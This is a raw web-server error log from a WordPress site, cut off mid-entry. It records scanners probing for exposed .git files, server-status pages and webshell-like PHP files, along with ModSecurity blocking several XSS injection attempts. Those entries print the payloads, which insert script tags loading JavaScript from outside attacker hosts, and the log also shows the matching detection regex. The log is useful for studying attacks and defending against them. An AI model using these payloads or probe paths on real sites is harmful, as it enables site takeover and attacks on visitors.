/home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 04 19:55:46.907317 2024] [:error] [pid 16472:tid 140493052626688] [client 203.55.81.229:33356] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Oct 04 19:55:47.006249 2024] [:error] [pid 16472:tid 140493304219392] [client 203.55.81.229:33358] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Oct 04 19:56:12.557420 2024] [:error] [pid 16471:tid 140493052626688] [client 203.55.81.229:33422] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Fri Oct 04 19:56:15.501822 2024] [autoindex:error] [pid 16472:tid 140493069412096] [client 203.55.81.229:33430] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 04 19:56:30.677010 2024] [:error] [pid 16471:tid 140493102982912] [client 203.55.81.229:33462] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Oct 04 21:02:48.736486 2024] [autoindex:error] [pid 16472:tid 140493027448576] [client 193.34.213.181:34222] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 05 03:54:41.090419 2024] [:error] [pid 31471:tid 140334206011136] [client 179.43.191.19:46908] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZwD-0RvQQ1xGDDqmLK277QAAAIk"], referer: https://INVESTIGACIONPERU.COM 2024/10/05 07:18:36 [error] 31556#31556: *198478 access forbidden by rule, client: 98.82.127.144, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/10/05 21:25:55 [error] 31555#31555: *204778 access forbidden by rule, client: 98.82.127.144, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Oct 06 00:50:13.618080 2024] [:error] [pid 32075:tid 140334231189248] [client 179.43.191.19:36736] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZwIlFTEWRjCv6XX6wHKL_gAAAMY"], referer: https://INVESTIGACIONPERU.COM [Sun Oct 06 01:56:25.558570 2024] [autoindex:error] [pid 32075:tid 140334328739584] [client 138.199.18.156:38688] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/10/06 01:56:25 [error] 31556#31556: *209322 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 138.199.18.156, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2024/10/06 01:56:26 [error] 31556#31556: *209322 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 138.199.18.156, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Sun Oct 06 01:56:28.711564 2024] [autoindex:error] [pid 31471:tid 140334138869504] [client 138.199.18.156:38698] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:42.379601 2024] [autoindex:error] [pid 32075:tid 140334189225728] [client 138.199.18.156:38752] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:47.107569 2024] [autoindex:error] [pid 31469:tid 140334337132288] [client 138.199.18.156:38764] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:47.224415 2024] [autoindex:error] [pid 31469:tid 140334164047616] [client 138.199.18.156:38766] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:47.392257 2024] [autoindex:error] [pid 31469:tid 140334328739584] [client 138.199.18.156:38768] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:48.135483 2024] [autoindex:error] [pid 31469:tid 140334155654912] [client 138.199.18.156:38772] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:48.360497 2024] [autoindex:error] [pid 32075:tid 140334222796544] [client 138.199.18.156:38780] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:48.510586 2024] [autoindex:error] [pid 32075:tid 140334353917696] [client 138.199.18.156:38784] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:48.704811 2024] [autoindex:error] [pid 32075:tid 140334320346880] [client 138.199.18.156:38788] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:48.832928 2024] [autoindex:error] [pid 31471:tid 140334328739584] [client 138.199.18.156:38792] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:49.003731 2024] [autoindex:error] [pid 31470:tid 140334080120576] [client 138.199.18.156:38796] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:49.661211 2024] [:error] [pid 32075:tid 140334130476800] [client 138.199.18.156:38798] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Sun Oct 06 01:56:49.661468 2024] [:error] [pid 32075:tid 140334130476800] [client 138.199.18.156:38798] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Sun Oct 06 01:56:49.661633 2024] [:error] [pid 32075:tid 140334130476800] [client 138.199.18.156:38798] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Sun Oct 06 01:56:49.661828 2024] [:error] [pid 32075:tid 140334130476800] [client 138.199.18.156:38798] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Sun Oct 06 01:56:50.606996 2024] [autoindex:error] [pid 32075:tid 140334122084096] [client 138.199.18.156:38804] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:51.228157 2024] [autoindex:error] [pid 31471:tid 140334147262208] [client 138.199.18.156:38812] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:51.350951 2024] [autoindex:error] [pid 31469:tid 140334147262208] [client 138.199.18.156:38816] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:51.523114 2024] [autoindex:error] [pid 31470:tid 140334320346880] [client 138.199.18.156:38818] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:51.631667 2024] [autoindex:error] [pid 31471:tid 140334172440320] [client 138.199.18.156:38820] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:51.818082 2024] [autoindex:error] [pid 32075:tid 140334231189248] [client 138.199.18.156:38822] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:52.028793 2024] [autoindex:error] [pid 31470:tid 140334214403840] [client 138.199.18.156:38824] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:52.613860 2024] [autoindex:error] [pid 32075:tid 140334197618432] [client 138.199.18.156:38830] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:56:53.944785 2024] [autoindex:error] [pid 31471:tid 140334080120576] [client 138.199.18.156:38840] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 01:57:03.088372 2024] [autoindex:error] [pid 31469:tid 140334080120576] [client 138.199.18.156:38924] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 06 15:28:09.065109 2024] [authz_core:error] [pid 20637:tid 139996769261312] [client 46.101.111.185:51376] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/06 15:28:13 [error] 19776#19776: *217191 access forbidden by rule, client: 46.101.111.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Oct 06 17:01:37.567890 2024] [authz_core:error] [pid 20637:tid 139996640032512] [client 209.38.248.17:52616] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/06 17:01:42 [error] 19776#19776: *217987 access forbidden by rule, client: 209.38.248.17, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Oct 06 22:49:55.553419 2024] [autoindex:error] [pid 15115:tid 139996564498176] [client 165.22.215.19:59184] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Oct 07 07:43:42.746965 2024] [autoindex:error] [pid 16398:tid 139639005480704] [client 4.247.166.147:44766] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Oct 07 15:46:47.620560 2024] [:error] [pid 15815:tid 139638849107712] [client 89.248.174.11:57090] [client 89.248.174.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:mapTypes. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://aka.cloudsyndication.dev/></script> found within ARGS:mapTypes: facebook|twitter|linkedin|onetwo\\x22></option></select></div><script src=https://aka.cloudsyndication.dev/></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZwRItz29y0Y-oCIliNbE3wAAAEs"] [Mon Oct 07 16:47:36.071249 2024] [autoindex:error] [pid 15816:tid 139638748395264] [client 195.3.223.154:58642] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 08 00:37:21.209252 2024] [:error] [pid 15816:tid 139638916249344] [client 89.248.174.11:56622] [client 89.248.174.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:mapTypes. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://aka.cloudsyndication.dev/></script> found within ARGS:mapTypes: facebook|twitter|linkedin|onetwo\\x22></option></select></div><script src=https://aka.cloudsyndication.dev/></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZwTFEaIX8dQjpoz4-dmPkwAAAIM"] 2024/10/08 02:30:22 [error] 15774#15774: *255991 access forbidden by rule, client: 183.178.98.85, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Tue Oct 08 15:27:09.346835 2024] [authz_core:error] [pid 19580:tid 139683375855360] [client 138.68.82.23:55116] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/08 15:27:14 [error] 18974#18974: *268238 access forbidden by rule, client: 138.68.82.23, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Oct 08 18:52:43.955475 2024] [authz_core:error] [pid 19012:tid 139683283535616] [client 64.225.75.246:60552] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/08 18:52:49 [error] 18974#18974: *271263 access forbidden by rule, client: 64.225.75.246, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Oct 08 21:53:39.896344 2024] [autoindex:error] [pid 18707:tid 139683249964800] [client 34.39.7.221:44814] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 08 21:53:42.461398 2024] [autoindex:error] [pid 19236:tid 139683401033472] [client 34.39.7.221:44830] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 08 21:53:49.157464 2024] [autoindex:error] [pid 18834:tid 139683308713728] [client 34.39.7.221:44862] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 08 21:54:10.749318 2024] [autoindex:error] [pid 19236:tid 139683308713728] [client 34.39.7.221:44928] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/10/08 21:54:22 [error] 18669#18669: *276167 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 34.39.7.221, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" [Wed Oct 09 12:15:02.920996 2024] [:error] [pid 31411:tid 140186189035264] [client 45.227.254.34:55586] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentytwentyone/wplogin.php"] [unique_id "Zwa6FlKFBooxJOrl6NRe8QAAAMI"] [Wed Oct 09 18:19:44.309177 2024] [autoindex:error] [pid 30783:tid 140186096715520] [client 95.217.166.86:46048] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 09 20:52:24.981693 2024] [authz_core:error] [pid 30783:tid 140186096715520] [client 139.59.132.8:48436] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/09 20:52:30 [error] 30739#30739: *291614 access forbidden by rule, client: 139.59.132.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Oct 10 02:08:43.522406 2024] [autoindex:error] [pid 30783:tid 140186267186944] [client 20.197.35.86:53310] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 10 02:08:57.833643 2024] [autoindex:error] [pid 30781:tid 140186180642560] [client 20.197.35.86:53320] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 10 15:15:34.046294 2024] [authz_core:error] [pid 1879:tid 139700455012096] [client 64.23.218.208:41336] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/10 15:15:38 [error] 1840#1840: *304630 access forbidden by rule, client: 64.23.218.208, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Oct 10 20:05:57.270407 2024] [:error] [pid 2437:tid 139700538939136] [client 78.153.140.218:47026] [client 78.153.140.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match 